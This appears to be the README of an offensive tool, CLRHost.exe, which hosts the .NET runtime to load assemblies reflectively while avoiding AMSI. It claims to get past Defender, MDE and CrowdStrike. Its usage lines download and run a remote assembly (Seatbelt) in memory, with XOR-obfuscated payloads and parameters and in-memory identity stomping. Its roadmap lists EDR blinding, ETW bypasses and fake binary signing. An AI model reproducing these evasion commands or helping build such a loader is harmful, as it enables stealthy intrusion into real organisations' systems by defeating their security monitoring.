Documentation and usage coming (grep around for params). Leverages load_2 overload for deprecated CorRuntime interface to avoid loading AMSI per https://github.com/passthehashbrowns/Being-A-Good-CLR-Host. Comes with some shitty guard rails and anti emulation as well as a native .NET Data Directory metadata parser for lazy identity stomping.

Clears Defender, MDE and Crowdstrike as of writing.

load something from disk CLRHost.exe -d -a C:\Windows\Temp\benign.exe

exhaust EDR/AV attention by loading an embedded benign binary (requires baking in a RCDATA resource pointing to an assembly). can also set appropriate --exhaust params and point it to a disk or web reflected assembly. CLRHost.exe -d -a C:\Windows\Temp\benign.exe --exhaust-embedded

list methods in assembly CLRHost.exe -d -a C:\Windows\Temp\benign.exe --list-methods

reflectively load from web with arg string and stomp identity in memory CLRHost.exe -w -a https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.0_x64/Seatbelt.exe --verbose -p "LocalUsers" --stomp-identity

same as above but for xor encoded (with repeating mask) payload CLRHost.exe --xor --key some_key_here -w -a https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.0_x64/Seatbelt.exe --verbose -p "LocalUsers" --stomp-identity

same as above but we also mask params CLRHost.exe --param-xor --param-key testmask --xor --key testmask -w -a HBEHBB5bXEQTDAccGANdCBsIXDIBAB0MAgwYWz4JEhkEJhwYAQQQHx0KHVsfAAREBgAVB0IJFgoQFlwZDBIHDgZKPREZJwEKGQAEGx8KLF9aVSwMW1VcOBEEBxYIDQdFER0W --verbose -p OAoQFQE0AA4GFg== --stomp-identity

• better parameter parsing to allow calling non string array methods when using --invoke-member
• interactive mode so that app domain doesn't get torn down and we can keep loading stuff. could be useful for loading system GAC assemblies then manipulating them ala powershell .NET tradecraft
• add optional compile time includes for EDR blinding (loud and softer ones like WFP abuse), patchless ETW bypasses etc
• verify and fix some probable index width sizing errors with metadata stream parsing when ID stomping
• if im bothered migrate it out to classes so its not an unmaintainable codebase monster
• fake sign the binary?